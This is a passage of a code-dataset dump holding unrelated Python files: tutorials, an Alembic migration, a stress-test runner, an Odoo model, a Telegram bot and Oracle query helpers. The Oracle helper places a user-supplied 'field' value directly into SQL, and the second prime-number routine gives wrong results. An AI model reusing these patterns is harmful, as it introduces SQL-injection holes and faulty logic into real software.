\"pepperoni\")\npizza.make_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\nfrom scratch_8_modules import make_pizza\n\nmake_pizza(16, \"pepperoni\")\nmake_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\nfrom scratch_8_modules import make_pizza as mp\n\nmp(16, \"pepperoni\")\nmp(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\nimport scratch_8_modules as p\n\np.make_pizza(16, \"pepperoni\")\np.make_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\nfrom scratch_8_modules import *\n\nmake_pizza(16, \"pepperoni\")\nmake_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n","sub_path":"chapter8/scratch_8.py","file_name":"scratch_8.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"53552960","text":"\"\"\"Add comments table\n\nRevision ID: 83dce15c3d36\nRevises: 75844bac4c9d\nCreate Date: 2019-06-10 15:23:11.647466\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '83dce15c3d36'\ndown_revision = '75844bac4c9d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(), nullable=True),\n sa.Column('comment', sa.String(), nullable=True),\n sa.Column('postedAt', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('comments')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/83dce15c3d36_add_comments_table.py","file_name":"83dce15c3d36_add_comments_table.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"22396694","text":"# -*- coding: utf-8 -*-\r\n#!/usr/bin/env python\r\n# Copyright 2018 ZhangT. All Rights Reserved.\r\n# Author: ZhangT\r\n# Author-Github: github.com/zhangt2333\r\n# ACM对拍器.py 2018/8/21 00:04\r\n\r\nfrom random import *\r\nimport os\r\nimport re\r\nimport sys\r\n\r\n\r\ndef prepare(dir, isAnsCpp):\r\n \"\"\"对代码文件加上freopen\"\"\"\r\n file = dir + ('ans.cpp' if isAnsCpp else \"my.cpp\")\r\n RE = re.compile('int main\\(\\)\\s{0,}\\{')\r\n add = 'int main()\\n{\\n\\tfreopen(\"in.txt\",\"r\",stdin);\\n\\t'\r\n add = add + ('freopen(\"ans.txt\",\"w\",stdout);' if isAnsCpp else 'freopen(\"my.txt\",\"w\",stdout);')\r\n with open(file, \"r+\", encoding='utf-8') as f:\r\n try:\r\n string = f.read()\r\n except Exception:\r\n f.close()\r\n raise Exception('cppFile must under utf-8 encoding')\r\n if 'main' not in string:\r\n f.close()\r\n raise Exception('\"int main()\" not found in file')\r\n if 'freopen' in string:\r\n f.close()\r\n return\r\n string = RE.split(string)\r\n string = string[0] + add + string[1]\r\n f.write(string)\r\n f.close()\r\n\r\n\r\ndef compile(dir_gpp, dir):\r\n \"\"\"用g++编译器编译cpp\"\"\"\r\n os.system('call \"{}\" \"{}ans.cpp\" -o \"{}ans\"'.format(dir_gpp, dir, dir))\r\n os.system('call \"{}\" \"{}my.cpp\" -o \"{}my\"'.format(dir_gpp, dir, dir))\r\n\r\n\r\ndef run(dir):\r\n \"\"\"运行编译后的文件\"\"\"\r\n os.system('cd \"{}\"&\"{}ans\"'.format(dir, dir))\r\n os.system('cd \"{}\"&\"{}my\"'.format(dir, dir))\r\n\r\n\r\ndef cmp(dir):\r\n \"\"\"对文件结果进行比较\"\"\"\r\n res = os.popen('fc \"{}ans.txt\" \"{}my.txt\"'.format(dir, dir))\r\n return res.read()\r\n\r\n\r\ndef show(dir):\r\n \"\"\"弹出对拍错误结果\"\"\"\r\n with open(dir + 'my.txt', \"r\", encoding='UTF-8') as f1, \\\r\n open(dir + 'ans.txt', \"r\", encoding='UTF-8') as f2,\\\r\n open(dir + 'in.txt', \"a\", encoding='UTF-8') as f3:\r\n string = '你的输出:\\n' + f1.read() + '标程输出:\\n' + f2.read()\r\n f3.write(string)\r\n f1.close()\r\n f2.close()\r\n f3.close()\r\n os.popen(dir + 'in.txt')\r\n\r\n\r\ndef work(path_gpp, dir, times):\r\n \"\"\"对拍器工作函数\"\"\"\r\n path_gpp = os.path.abspath(path_gpp)\r\n dir = os.path.abspath(dir) + '\\\\'\r\n print(\"正在预处理源代码...\")\r\n try:\r\n prepare(dir, True)\r\n prepare(dir, False)\r\n except Exception as e:\r\n print('对文件添加freopen语句失败({})'.format(str(e)))\r\n sys.exit(-1)\r\n print(\"正在编译文件...\")\r\n compile(path_gpp, dir)\r\n cnt = 0\r\n while (cnt <= times):\r\n cnt += 1\r\n print('正在进行第{}次对拍'.format(cnt))\r\n generate_data(dir)\r\n run(dir)\r\n res = cmp(dir)\r\n if '找不到差异' not in res:\r\n show(dir)\r\n break\r\n\r\n# -------------------------------------以上是函数封装区(懒得分多文件了)----------------------------------------------\r\n\r\n\r\n# 此处重写随机数据生成算法\r\ndef generate_data(dir):\r\n \"\"\"随机数据生成算法\"\"\"\r\n file = dir + 'in.txt'\r\n data = ''\r\n # -----------------------------------此处重写随机数据生成算法---------------------------\r\n\r\n k = randint(22, 32)\r\n A = randint(0, (1 << k) - 1)\r\n B = randint(0, (1 << k) - 1)\r\n C = randint(0, (1 << k) - 1)\r\n data = data + \"{} {} {} {}\".format(A, B, C, k) + '\\n'\r\n\r\n # -----------------------------------此处重写随机数据生成算法--------------------------\r\n with open(file, \"w\", encoding='utf-8') as f:\r\n f.write(data)\r\n f.close()\r\n\r\n\r\n# 此处配置对拍器\r\npath_gpp = 'C:/Program Files/CodeBlocks/MinGW/bin/g++.exe' # 编译器路径\r\ndir = 'C:/Users/TTTT/Desktop/2018ACM暑期集训/对拍进行时' # 两个cpp源文件(ans.cpp,my.cpp)的目录\r\ntimes = 1000\r\n\r\nif __name__ == '__main__':\r\n work(path_gpp, dir, times)\r\n","sub_path":"ACM对拍器(for windows).py","file_name":"ACM对拍器(for windows).py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"537468814","text":"import numpy as np\nfrom opencmiss.iron import iron\nimport fields\n\ndef interpolate_field(field, element_ids=[], num_values=4,dimension=3, derivative_number=1, xi=None, elems=None):\n\n if xi is None:\n XiNd = fields.generate_xi_grid_fem(num_points=num_values)\n\n num_elem_values = XiNd.shape[0]\n num_Xe = len(element_ids)\n total_num_values = num_Xe * num_elem_values\n values = np.zeros((num_Xe, num_elem_values, dimension))\n xi = np.zeros((num_Xe, num_elem_values, dimension))\n elements = np.zeros((num_Xe, num_elem_values, 1))\n\n for elem_idx, element_id in enumerate(element_ids):\n for point_idx in range(num_elem_values):\n single_xi = XiNd[point_idx,:]\n values[elem_idx, point_idx, :] = field.ParameterSetInterpolateSingleXiDP(iron.FieldVariableTypes.U,\n iron.FieldParameterSetTypes.VALUES, derivative_number, element_id, single_xi, dimension)\n xi[elem_idx, :, :] = XiNd\n elements[elem_idx, :] = element_id\n\n values = np.reshape(values, (total_num_values, dimension))\n xi = np.reshape(xi, (total_num_values, dimension))\n elements = np.reshape(elements, (total_num_values))\n return values, xi, elements\n else:\n num_values = xi.shape[0]\n values = np.zeros((num_values, dimension))\n for point_idx in range(xi.shape[0]):\n element_id = elems[point_idx]\n single_xi = xi[point_idx,:]\n values[point_idx, :] = field.ParameterSetInterpolateSingleXiDP(iron.FieldVariableTypes.U,\n iron.FieldParameterSetTypes.VALUES, derivative_number, int(element_id), single_xi, dimension)\n return values","sub_path":"mesh_tools/opencmiss_fields.py","file_name":"opencmiss_fields.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"2212515","text":"import logging\n\nfrom odoo import api, fields, models, _\n\n_logger = logging.getLogger(__name__)\n\n\nclass StockLocation(models.Model):\n _inherit = 'stock.location'\n\n ###############################\n # FIELDS\n ###############################\n ignore_compute_on_hand = fields.Boolean(_('Ignore To Compute Product Qty'), default=False)\n\n ###############################\n # HELPER FUNCTIONS\n ###############################\n def get_all_locations_of_warehouse(self, warehouse_id, company_id, is_excluded_location=True):\n result = []\n StockWarehouse = self.env['stock.warehouse']\n StockLocation = self.env['stock.location']\n Product = self.env['product.product']\n\n location_ids = [w.view_location_id.id for w in StockWarehouse.browse([warehouse_id])]\n if location_ids:\n # get all locations of selected warehouse\n domain_quant_loc, _, _ = Product._get_domain_locations_new(\n location_ids=location_ids, company_id=company_id, compute_child=True)\n\n all_locations_in_warehouse = StockLocation.search(domain_quant_loc).ids\n if is_excluded_location is True:\n excluded_location_ids = self.get_excluded_locations()\n result = list(set(all_locations_in_warehouse) - set(excluded_location_ids))\n else:\n result = all_locations_in_warehouse\n\n return result\n\n def get_excluded_locations(self):\n result = self.search([('ignore_compute_on_hand', '=', True)]).ids\n return result\n","sub_path":"SI/si_core/models/inherit_stock_location.py","file_name":"inherit_stock_location.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"249661851","text":"import asyncio\nfrom typing import NamedTuple\nfrom urllib.parse import urlencode\nfrom urllib.request import Request, urlopen\n\nfrom ._utils.case_insensitive_dict import CaseInsensitiveDict\n\n\nclass BotRequest(NamedTuple):\n endpoint: str\n method: str = 'GET'\n params: dict = {}\n data: bytes = None\n headers: CaseInsensitiveDict = CaseInsensitiveDict()\n\n\nclass Bot:\n update_types = [\n ('message', 'message'),\n ('edited_message', 'message'),\n ('channel_post', 'message'),\n ('edited_channel_post', 'message'),\n ('inline_query', 'inline_query'),\n ('chosen_inline_result', 'chosen_inline_result'),\n ('callback_query', 'callback_query'),\n ('shipping_query', 'shipping_query'),\n ('pre_checkout_query', 'pre_checkout_query')\n ]\n\n # optional features\n check_update = None\n\n def __init__(self, token, loop=None):\n \"\"\"\n The Class(TM).\n\n :param token: The Telegram-given token\n :param loop: The loop the bot is run into (if it's not asyncio.get_event_loop())\n \"\"\"\n\n self.token = token\n\n if loop is None:\n self.loop = asyncio.get_event_loop()\n else:\n self.loop = loop\n\n self.triggers = []\n self.update_queue = asyncio.PriorityQueue(loop=self.loop)\n self.base_url = f'https://api.telegram.org:443/bot{token}/'\n\n async def api_request(self, request: BotRequest):\n \"\"\"\n Makes a Telegram request with the params given in the BotRequest\n\n :param request: A BotRequest\n :return: The response from the server\n \"\"\"\n\n endpoint = request.endpoint\n params = request.params\n data = request.data\n headers = request.headers\n\n if params:\n url = f'{self.base_url}{endpoint}?{urlencode(params)}'\n else:\n url = f'{self.base_url}{endpoint}'\n\n if data and 'content-length' not in headers:\n headers['content-length'] = len(data)\n\n req = Request(url=url, method=request.method, data=data, headers=headers)\n res = await self.loop.run_in_executor(None, urlopen, req)\n return res\n\n def get_type_and_flavor(self, update):\n for _type, flavor in self.update_types:\n if _type in update:\n update['_type'] = _type\n update['_flavor'] = flavor\n return\n else:\n update['_type'] = None\n update['_flavor'] = None\n\n async def start(self):\n \"\"\"Main loop\"\"\"\n\n while True:\n _, update = await self.update_queue.get()\n self.loop.create_task(self.__handle_update(update))\n\n async def __handle_update(self, update):\n # check the update if the function is implemented and skip if it's not passed\n # note that while the function is called check_update it's basically a pre-processing hook, so if you have to\n # call get_type_and_flavor do it here\n check_update = self.check_update\n if check_update:\n is_check_passed = await check_update(update, self)\n if is_check_passed is not True:\n return\n\n for trigger in self.triggers:\n is_update_matched = await trigger.match(update, self)\n if is_update_matched is True:\n return await trigger.handle(update, self)\n\n def push_update(self, update):\n \"\"\"\n Pushes an update (already json decoded) into the queue.\n\n :param update: The update to be pushed in the queue\n \"\"\"\n\n self.update_queue.put_nowait((update['update_id'], update))\n\n def trigger(self, trigger):\n \"\"\"\n Decorates a Trigger, inserting it into the bot check list\n \"\"\"\n\n # maybe trigger may already be instances? Or we can call the methods directly?\n # or use factory methods\n self.triggers.append(trigger)\n return trigger\n","sub_path":"ubot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"179608502","text":"import ujson\nfrom datetime import datetime, date\n\nimport cx_Oracle\n\nfrom controller.utils.db_conection.oracle_db.pool import create_pool\n\nimport logging.config\n\nlog = logging.getLogger(__name__)\n\napp = None\n\ncx_Oracle.__future__.dml_ret_array_val = True\n\nasync def create_pools(loop, **DB_CONFIG):\n pool = await create_pool(**DB_CONFIG, loop=loop)\n return pool\n\nasync def get_check_acl(acl,pool,method,name):\n data = await get_items(pool, 'acl_white', {\"method\": method, \"name\": name})\n for i in data:\n if acl.get(i.get(\"name\")):\n acl[i.get(\"name\")][i.get(\"method\")] = set(i.get(\"rolename\"))\n else:\n acl[i.get(\"name\")] = {i.get(\"method\"): {}}\n acl[i.get(\"name\")][i.get(\"method\")] = set(i.get(\"rolename\"))\n return acl\n\nasync def get_all_tables(pool, **DB_CONFIG):\n async with await pool.acquire() as connection:\n tables = {}\n async with await connection.cursor() as cur:\n await cur.execute(\"\"\"SELECT object_name,object_type FROM user_objects WHERE object_type IN ('TABLE','VIEW')\"\"\")\n\n r = await cur.fetchall()\n tables.update({x[0].lower(): x[1].lower() for x in r})\n return tables\n\ndef _fix_types(record, attributes):\n d = {}\n for i in record:\n if attributes.get(i) == 'timestamp':\n if record[i]:\n d[i] = record[i].strftime(\"%Y-%m-%d %H:%M:%S\")\n elif record[i] and attributes.get(i) == 'clob':\n d[i] = ujson.loads(record[i].read())\n else:\n d[i] = record[i]\n return d\n\n\ndef _prepare_vaules(stmt, args_db):\n values = []\n for i, params in enumerate(stmt.get_parameters()):\n log.info(f\"trump:{params.name}\")\n if params.name.startswith('int') and params.kind == 'array':\n values.append([int(x) for x in args_db[i]])\n elif params.name.startswith('int') and params.kind != 'array':\n values.append(int(args_db[i]))\n elif params.name == 'timestamptz' or params.name == 'timestamp' or params.name == 'date':\n n = args_db[i].count(':')\n fmt = \"%Y-%m-%d\"\n if n == 1:\n fmt = \"%Y-%m-%d %H:%M\"\n elif n == 2:\n fmt = \"%Y-%m-%d %H:%M:%S\"\n values.append(datetime.strptime(args_db[i], fmt))\n elif params.name == 'bool':\n values.append(bool(args_db[i]))\n else:\n values.append(args_db[i])\n return values\n\n\ndef _prepare_vaules_write(attributes, key, value):\n if attributes.get(key) == 'clob':\n if type(value) != str:\n value = ujson.encode(value)\n elif attributes.get(key) == 'timestamptz' or attributes.get(key) == 'timestamp' or attributes.get(key) == 'date':\n n = value.count(':')\n fmt = \"%Y-%m-%d\"\n if n == 1:\n fmt = \"%Y-%m-%d %H:%M\"\n elif n == 2:\n fmt = \"%Y-%m-%d %H:%M:%S\"\n value = datetime.strptime(value, fmt)\n return value\n\nasync def get_items(db, table, args={}, roles=False, with_total=False, pager=False, uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n row = await cur.fetchmany()\n where = []\n args_db = []\n total = 0\n times = []\n field = '*'\n attributes = {s[0].lower(): s[1] for s in cur.description()}\n for k,v in attributes.items():\n if attributes.get(k).__name__ == 'TIMESTAMP' or attributes.get(k).__name__ == 'date':\n times.append(k)\n for arg_key in args:\n if arg_key in attributes:\n if args.get(arg_key) is None:\n where.append(f'{arg_key} IS NULL')\n else:\n where.append(f'{arg_key} = :s')\n args_db.append(args.get(arg_key))\n\n elif arg_key.split('-')[0] in attributes:\n key, op = arg_key.split('-')\n param = f\"to_date(:s, 'YYYY-MM-DD HH24:MI:SS')\"\n if op == 'in':\n args_array = ','.join([':s' for x in args.get(arg_key).split(',')])\n where.append(f'{key} IN ({args_array})')\n args_db.extend(args.get(arg_key).split(','))\n elif op == 'nein':\n args_array = ','.join([':s' for x in args.get(arg_key).split(',')])\n where.append(f'{key} NOT IN ({args_array})')\n args_db.extend(args.get(arg_key).split(','))\n elif op == 'gt':\n if key in times:\n where.append(f\"{key} > {param}\")\n else:\n where.append(f'{key} > :s')\n args_db.append(args.get(arg_key))\n elif op == 'gte':\n if key in times:\n where.append(f\"{key} >= {param}\")\n else:\n where.append(f'{key} >= :s')\n args_db.append(args.get(arg_key))\n elif op == 'lt':\n if key in times:\n where.append(f\"{key} < {param}\")\n else:\n where.append(f'{key} < :s')\n args_db.append(args.get(arg_key))\n elif op == 'lte':\n if key in times:\n where.append(f\"{key} <= {param}\")\n else:\n where.append(f'{key} <= :s')\n args_db.append(args.get(arg_key))\n elif op == 'ne':\n if key in times:\n where.append(f\"{key} <> {param}\")\n else:\n where.append(f'{key} <> :s')\n args_db.append(args.get(arg_key))\n elif op == 'no':\n where.append(f'{key} IS NOT NULL')\n elif op == 'range':\n # '(a > 1 and a < 10)'\n _min_, _max_ = args.get(arg_key).split('|')\n if _min_:\n if key in times:\n where.append(f\"{key} >= {param}\")\n else:\n where.append(f'{key} >= :s')\n args_db.append(_min_)\n if _max_:\n if key in times:\n where.append(f\"{key} <= {param}\")\n else:\n where.append(f'{key} <= :s')\n args_db.append(_max_)\n elif op == 'overlap':\n where.append(f'dbms_lob.instr({key},:s) > 0')\n args_db.append(args.get(arg_key))\n elif op == 'like':\n where.append(f'{key} LIKE :s')\n args_db.append('%' + args.get(arg_key) + '%')\n elif op == 'like_raw':\n where.append(f'{key} LIKE :s')\n args_db.append(dict(args).get(arg_key))\n\n if attributes.get('view_roles') and roles is not False:\n roles = ''.join(roles)\n where.append(f'dbms_lob.instr(view_roles,:s) > 0')\n args_db.append(roles)\n\n where_cause = 'WHERE ' + ' AND '.join(where) if where else ''\n\n new_list = []\n if with_total:\n sql = f'SELECT count(*) FROM {table} {where_cause}'\n await cur.execute(sql, args_db)\n r = await cur.fetchmany()\n total = r[0][0]\n new_list = []\n columns = [i[0].lower() for i in cur.description()]\n log.info(f\"columns:{columns}\")\n lists = []\n for rows in r:\n lists.append(list(rows))\n for row in lists:\n row_dict = dict()\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n new_list.append(row_dict)\n\n if args.get('field'):\n field = args.get('field')\n order = ''\n sort = args.get('sort')\n if sort:\n sort_list = sort.split(',')\n order_list = []\n for item_sort in sort_list:\n order_column = item_sort.strip('-')\n if order_column in attributes:\n order_type = 'ASC' if item_sort.startswith('-') else 'DESC'\n order_list.append(f'{order_column} {order_type}')\n if order_list:\n order_cause = ', '.join(order_list)\n order = f'ORDER by {order_cause}'\n sql = f'SELECT {field} FROM {table} {where_cause} {order}'\n\n if pager:\n page_size = args.get('pagesize') if args.get('pagesize') else 10\n try:\n page = int(args.get('page')) if args.get('page') else 0\n int(page_size)\n current_position = (page + 1) * int(page_size)\n min_position = int(current_position) - int(page_size) if args.get('page') else 0\n log.info(f\"current_position:{current_position}\")\n sql = f'SELECT {field} FROM (SELECT ROWNUM rn,e.* FROM (SELECT * FROM {table} {where_cause} {order})e ' \\\n f'WHERE ROWNUM<={current_position}) t2 WHERE t2.rn >{min_position}'\n except Exception as e:\n pass\n log.info(f\"sql===={sql} \\n args_db:{args_db}\")\n await cur.execute(sql, args_db)\n r = await cur.fetchall()\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n new_list = []\n columns = [i[0].lower() for i in cur.description()]\n lists = []\n for rows in r:\n lists.append(list(rows))\n for row in lists:\n row_dict = dict()\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n new_list.append(row_dict)\n if with_total:\n return (total, [_fix_types(item, attributes) for item in new_list])\n else:\n return [_fix_types(item, attributes) for item in new_list]\n\nasync def get_item(db, table, oid, roles=False, column='id', uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n value = [oid]\n times = []\n row = []\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n attributes = {s[0].lower(): s[1] for s in cur.description()}\n for k,v in attributes.items():\n if attributes.get(k).__name__ == 'TIMESTAMP' or attributes.get(k).__name__ == 'date':\n times.append(k)\n if column in times:\n sql = f\"SELECT * FROM {table} WHERE {column} = to_date(:s, 'YYYY-MM-DD HH24:MI:SS')\"\n else:\n sql = f'SELECT * FROM {table} WHERE {column} = :s'\n if attributes.get('view_roles') and roles is not False:\n sql += ' AND dbms_lob.instr(view_roles,:s) > 0'\n value.append(''.join(roles))\n sql += ' AND rownum = 1'\n log.info(f\"sql===={sql} \\n value={value}\")\n await cur.execute(sql, value)\n stmt = await cur.fetchone()\n if stmt:\n columns = [i[0].lower() for i in cur.description()]\n row = list(stmt)\n row_dict = dict()\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n if stmt:\n return _fix_types(row_dict, attributes)\n\nasync def create_item(db, table, data, column='id', lock_table=False, uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n r = await cur.fetchmany()\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n result = []\n keys = []\n val_col = []\n count = 0\n if type(data) == list:\n vals = []\n for item in data:\n values = {}\n count += 1\n val_col = []\n keys = []\n for key in item:\n if key not in attributes: continue\n if key not in keys:\n keys.append(key)\n value = item[key]\n if attributes.get(key) == 'clob':\n await cur.setinputsizes(**{key: cx_Oracle.CLOB})\n val_col.append(\":\" + key)\n values[key] = _prepare_vaules_write(attributes, key, value)\n if attributes.get(\"id\") == 'string':\n idVar = await cur.var(cx_Oracle.STRING, arraysize=len(data))\n elif attributes.get(\"id\") == 'number':\n idVar = await cur.var(cx_Oracle.NUMBER, arraysize=len(data))\n values[\"idVar\"] = idVar\n vals.append(values)\n val_colums = \"(\" + ','.join(val_col) + \")\"\n key_columns = ', '.join([k for k in keys])\n sql = f\"INSERT INTO {table} ({key_columns}) VALUES {val_colums}\" \\\n f\" returning {column} into :idVar\"\n log.info(f\"sql===={sql}\")\n await cur.executemany(sql, vals)\n await connection.commit()\n idlist = idVar.values\n result = [int(i) if attributes.get(\"id\") == 'number' else i for item in idlist for i in item]\n return result\n else:\n values = {}\n for key in data:\n if key not in attributes: continue\n keys.append(key)\n value = data[key]\n if attributes.get(key) == 'clob':\n await cur.setinputsizes(**{key: cx_Oracle.CLOB})\n val_col.append(\":\" + key)\n values[key] = _prepare_vaules_write(attributes, key, value)\n val_colums = \"(\" + ','.join(val_col) + \")\"\n key_columns = ', '.join([k for k in keys])\n if attributes.get(\"id\") == 'string':\n idVar = await cur.var(cx_Oracle.STRING)\n elif attributes.get(\"id\") == 'number':\n idVar = await cur.var(cx_Oracle.NUMBER)\n sql = f\"INSERT INTO {table} ({key_columns}) VALUES {val_colums} returning {column} into :idVar\"\n log.info(f\"sql===={sql}\")\n values[\"idVar\"] = idVar\n await cur.execute(sql, values)\n if attributes.get(\"id\") == 'number':\n id = int(idVar.getvalue()[0])\n else:\n id = idVar.getvalue()[0]\n await connection.commit()\n return id\n\n\nasync def modify_item(db, table, oid, data, column='id', uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n r = await cur.fetchmany()\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n params = []\n values = []\n log.info(f\"data:{data}\")\n for key in data:\n if key not in attributes: continue\n params.append(f'{key} = :s')\n value = data[key]\n values.append(_prepare_vaules_write(attributes, key, value))\n\n args_array = ','.join([':s' for x in oid.split(',')])\n values.extend(oid.split(','))\n cause = ', '.join(params)\n sql = f\"UPDATE {table} SET {cause} WHERE {column} in ({args_array})\"\n log.info(f\"sql===={sql}\")\n await cur.execute(sql, values)\n result = cur.rowcount()\n await connection.commit()\n return result\n\n\n# 修改多条,data1为where条件例{'grade_id': int(params.get('grade_id'))}。data为修改内容,同modify_item\nasync def modify_items(db, table, data1, data, uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n r = await cur.fetchmany()\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n params = []\n values = []\n column = []\n for key in data:\n if key not in attributes: continue\n params.append(f'{key} = :s')\n value = data[key]\n values.append(_prepare_vaules_write(attributes, key, value))\n for key1 in data1:\n if key1 not in attributes: continue\n column.append(f'{key1} = :s')\n value = data1[key1]\n values.append(_prepare_vaules_write(attributes, key1, value))\n cause = ', '.join(params)\n condition = ' and '.join(column)\n sql = f\"UPDATE {table} SET {cause} WHERE {condition}\"\n log.info(f\"sql===={sql}\")\n await cur.execute(sql, values)\n result = cur.rowcount()\n await connection.commit()\n return result\n\nasync def delete_item(db, table, oid, column='id', uuid='-', uid='-'):\n async with await db.acquire() as conn:\n async with await conn.cursor() as cur:\n oids = []\n args_array = ','.join([':s' for x in oid.split(',')])\n oids.extend(oid.split(','))\n sql = f\"DELETE FROM {table} WHERE {column} in ({args_array})\"\n await cur.execute(sql, oids)\n await conn.commit()\n return True\n\nasync def query(pool, sql, *args, fetch_type = 'fetch', uuid='-', uid='-'):\n async with await pool.acquire() as connection:\n async with await connection.cursor() as cur:\n log.info(f\"sql===={sql} \\n args:{args}\")\n await cur.execute(sql,(*args,))\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n columns = [i[0].lower() for i in cur.description()]\n lists = []\n new_list = []\n if fetch_type == 'fetch':\n result = await cur.fetchall()\n for rows in result:\n lists.append(list(rows))\n for row in lists:\n row_dict = dict()\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n new_list.append(row_dict)\n return [_fix_types(item, attributes) for item in new_list]\n elif fetch_type == 'fetchrow':\n result = await cur.fetchone()\n row_dict = dict()\n if result:\n lists.append(list(result))\n for row in lists:\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n return _fix_types(row_dict, attributes)\n elif fetch_type == 'fetchval':\n result = await cur.fetchone()\n if result:\n result = result[0]\n if type(result) == datetime:\n return result.strftime(\"%Y-%m-%d %H:%M:%S\")\n return result\n elif fetch_type == 'attributes':\n return {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n\n# async def execute(pool, sql, *args, table, uuid='-', uid='-'):\n# async with pool.acquire() as connection:\n# statement = await connection.prepare(sql.format(*range(1, sql.count('{}')+1)))\n# updestmt = await connection.prepare(\"SELECT * FROM %s\"%(table))\n# attributes = {s[0]: s[1][1] for s in updestmt.get_attributes()}\n# values = _prepare_vaules(updestmt, args)\n# log.debug(f\"{uuid} {uid} arg:{args}\\nsql:{sql}\\nval:{values}\")\n# result = await connection.fetch(sql, *values)\n\nasync def execute(pool, sql, *args, uuid='-', uid='-'):\n log.info(f\"sql===={sql} \\n args:{args}\")\n async with pool.acquire() as conn:\n async with await conn.cursor() as cur:\n await cur.execute(sql, (*args,))\n await conn.commit()\n\n","sub_path":"common_interface/controller/utils/db_conection/oracle_db/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":21438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"104767043","text":"numb = int(input('Enter a number: '))\r\nprime = True\r\n\r\nfor b in range( 2 , numb ):\r\n if (numb % b == 0):\r\n prime = False\r\n break\r\nif prime:\r\n print('This is a Prime Number')\r\nelse:\r\n print('This is not a Prime Number')\r\n\r\n\r\n# Second Method\r\n\r\nn = int(input(\"Enter the number: \"))\r\nfor i in range( 2 , n ):\r\n if(n % i == 0):\r\n print('Its not prime')\r\n else:\r\n print(\"Its prime\")\r\n break\r\n\r\nprint(\"Done\")\r\n\r\n","sub_path":"28_prime_number.py","file_name":"28_prime_number.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"38624832","text":"#!/usr/bin/python3.6\r\n# This client is for training animals to eat from the feeder. \r\n# Sessions last 60 min\r\n# Trials consist of: tray light goes turns on \r\n#\t\t\t\t\tafter 500ms, 4 pellets drop\r\n#\t\t\t\t\tafter 5s tray light goes off\r\n#\t\t\t\t\tITI: VI m=30s sd=2.5s\r\nimport asyncio\r\nimport random\r\nimport time\r\nfrom whisker_conn import WhiskerConnector\r\n\r\nport = 3233\r\n\r\n\r\nclass WhiskerClient:\r\n\tdef __init__(self, loop, host, port):\r\n\t\tself.loop = loop\r\n\t\tself.host = host\r\n\t\tself.port = port\r\n\t\tself.main_conn = WhiskerConnector()\r\n\t\tself.imm_conn = None\r\n\t\tself.imm_port = None\r\n\t\tself.imm_code = None\r\n\t\tself.imm_conn_future = asyncio.Future()\r\n\t\tself.imm_reply_future = None\r\n\t\tself.screen_active = True\r\n\t\tself.expt_active = True\r\n\t\r\n\t@asyncio.coroutine\r\n\tdef connect(self):\r\n\t\tself.main_conn.add_handler('*', self.handle_main_all)\r\n\t\tself.main_conn.add_handler('ImmPort:', self.handle_Imm)\r\n\t\tself.main_conn.add_handler('Code:', self.handle_Code)\r\n\t\tself.main_conn.add_handler('Event:', self.handle_Event)\r\n\t\tprint(\"Connecting to Whisker Server at {}:{}\".format(self.host, self.port))\r\n\t\tyield from self.main_conn.connect(self.loop, 'localhost', self.port)\r\n\t\tyield from self.imm_conn_future\r\n\r\n\tdef handle_main_all(self, m):\r\n\t\tif m is 